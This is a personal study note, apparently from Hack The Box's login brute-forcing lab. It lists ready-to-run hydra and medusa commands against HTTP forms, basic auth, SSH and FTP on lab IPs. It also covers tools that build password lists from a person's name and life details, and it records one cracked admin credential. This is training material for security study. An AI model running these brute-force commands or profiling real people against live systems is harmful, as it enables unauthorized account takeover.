dkelly/md_notes
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
bf917d40af478db54d5350c1832d3283a020f245
md_notes/htb_login_brute_forcing.md
Donovan bf917d40af inital commit
2024-11-19 12:05:57 -06:00

2.4 KiB
Raw Blame History

HTB Login Brute Forcing

Login Forms

Hydra

hydra basic auth hydra -l basic-auth-user -P 2023-200_most_used_passwords.txt 127.0.0.1 http-get / -s 81

can use hydra to crack passcodes in the login:

djelly@htb[/htb]$ hydra [options] target http-post-form "path:params:condition_string"

I can look for a fail condition like: hydra ... http-post-form "/login:user=^USER^&pass=^PASS^:F=Invalid credentials"

Or a success conditions:

  • hydra ... http-post-form "/login:user=^USER^&pass=^PASS^:S=302" # looking for a redirect

  • hydra ... http-post-form "/login:user=^USER^&pass=^PASS^:S=Dashboard" # looking for "Dashboard"

Exercise

curl -s -O https://raw.githubusercontent.com/danielmiessler/SecLists/master/Usernames/top-usernames-shortlist.txt

curl -s -O https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/2023-200_most_used_passwords.txt

hydra -L top-usernames-shortlist.txt -P 2023-200_most_used_passwords.txt -f {Replace with ip} -s {replace with port} http-post-form "/:username=^USER^&password=^PASS^:F=Invalid credentials"

hydra -L top-usernames-shortlist.txt -P 2023-200_most_used_passwords.txt -f 83.136.251.254 -s 34996 http-post-form "/:username=^USER^&password=^PASS^:F=Invalid credentials"

Medusa

medusa -h 192.168.0.100 -U usernames.txt -P passwords.txt -M ssh

medusa -h -n -u sshuser -P 2023-200_most_used_passwords.txt -M ssh -t 3

medusa -h 94.237.59.119 -n 39693 -u sshuser -P 2023-200_most_used_passwords.txt -M ssh -t 3

Custom Wordlists

create likely usernames from a persons name: git clone https://github.com/urbanadventurer/username-anarchy.git ./username-anarchy Jane Smith > jane_smith_usernames.txt

cupp -i cupp in interactive mode will create lots of passwords from a persons life.

hydra -L usernames.txt -P jane-filtered.txt IP -s PORT -f http-post-form "/:username=^USER^&password=^PASS^:Invalid credentials"

: hydra -L jane_smith_usernames.txt -P jane-filtered.txt 94.237.60.154 -s 46018 -f http-post-form "/:username=^USER^&password=^PASS^:Invalid credentials"

Skill assessment1

:56383 hydra -L usernames.txt -P passwords.txt 94.237.50.94 http-get / -s 56383 [56383][http-get] host: 94.237.50.94 login: admin password: Admin123

Skill assess2

83.136.250.158:39972 hydra -L usernames.txt -P passwords.txt -s 38376 -V 94.237.50.94 ftp

hydra -l satwossh -P passwords.txt -s 39972 -V 83.136.250.158 ssh -t 4

medusa -M ssh -h 83.136.250.158 -u root -P passwords.txt -n 39972 -t 4